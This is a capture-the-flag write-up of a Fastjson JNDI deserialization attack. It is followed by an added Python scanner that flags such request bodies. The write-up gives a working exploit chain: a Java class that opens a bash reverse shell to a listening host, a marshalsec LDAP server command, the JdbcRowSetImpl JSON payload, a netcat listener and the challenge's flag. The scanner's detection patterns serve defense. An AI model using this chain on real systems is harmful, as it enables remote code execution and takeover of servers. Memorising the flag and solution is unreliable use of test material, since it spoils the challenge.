Compile Shell.java and place the compiled class on the VPS
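import java.lang.Runtime;
import java.lang.Process;

public class Shell {
    // The static initializer runs as soon as the class is loaded by the target JVM.
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            // kali-ip is a placeholder for the address of the listening machine.
            String[] commands = {"/bin/bash", "-c", "bash -i >& /dev/tcp/kali-ip/8888 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // Exceptions are deliberately ignored.
        }
    }
}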
Run the following command on the VPS
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://VPS-IP/#Shell PORT
Send the request with Burp; note the required data format: Content-Type: application/json
POC:
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://VPS-IP:PORT/Shell",
"autoCommit":true
}
}
Start a listener on Kali to receive the reverse shell
nc -lvnp 8888
Obtain the flag
flag-{bmh212b89ac-cbf2-41bd-be40-d32b757df8f6}
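
From the defender's side, the request body in the POC above has a recognizable shape: an "@type" key naming com.sun.rowset.JdbcRowSetImpl next to a dataSourceName that is an ldap:// URL. The following is an added example, not part of the original write-up: a small request-body scanner for a proxy or log pipeline. The function name scan_body, the finding labels, the extra ldaps:// and rmi:// schemes and the sample bodies are assumptions made for illustration.

```python
import json

# Constructed rule set: the class and the ldap:// scheme come from the POC above;
# ldaps:// and rmi:// are added assumptions about other JNDI-capable schemes.
GADGET_CLASSES = {"com.sun.rowset.JdbcRowSetImpl"}
JNDI_SCHEMES = ("ldap://", "ldaps://", "rmi://")


def scan_body(body):
    """Return sorted (json_path, finding) pairs for one request body (a str)."""
    try:
        # Parse instead of substring-matching so keys and values are compared
        # in their decoded form, wherever they are nested.
        doc = json.loads(body)
    except ValueError:
        # Strict parsing failed; still report a raw "@type" so the body is
        # reviewed instead of silently passed on.
        return [("$", "unparsed-body-with-@type")] if "@type" in body else []
    findings = []
    stack = [("$", doc)]
    while stack:
        path, node = stack.pop()
        if isinstance(node, dict):
            type_name = node.get("@type")
            if isinstance(type_name, str):
                kind = "gadget-class" if type_name in GADGET_CLASSES else "autotype-key"
                findings.append((path, kind + ":" + type_name))
            url = node.get("dataSourceName")
            if isinstance(url, str) and url.strip().lower().startswith(JNDI_SCHEMES):
                findings.append((path, "jndi-url:" + url))
            stack.extend((path + "." + key, value) for key, value in node.items())
        elif isinstance(node, list):
            stack.extend((path + "[%d]" % i, value) for i, value in enumerate(node))
    return sorted(findings)


# Constructed sample bodies; VPS-IP and PORT are the page's own placeholders.
SAMPLE_POC = ('{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
              '"dataSourceName":"ldap://VPS-IP:PORT/Shell","autoCommit":true}}')
SAMPLE_NESTED = '{"items":[{"x":{"@type":"com.example.Order"}}]}'
SAMPLE_BENIGN = '{"user":"alice","items":[{"type":"book","dataSourceName":"jdbc/orders"}]}'

if __name__ == "__main__":
    for name, body in (("poc", SAMPLE_POC), ("nested", SAMPLE_NESTED), ("benign", SAMPLE_BENIGN)):
        print(name, scan_body(body))
```

Any "@type" key in a body sent to an endpoint that does not expect typed JSON is worth alerting on; the gadget-class and jndi-url findings together match the POC exactly.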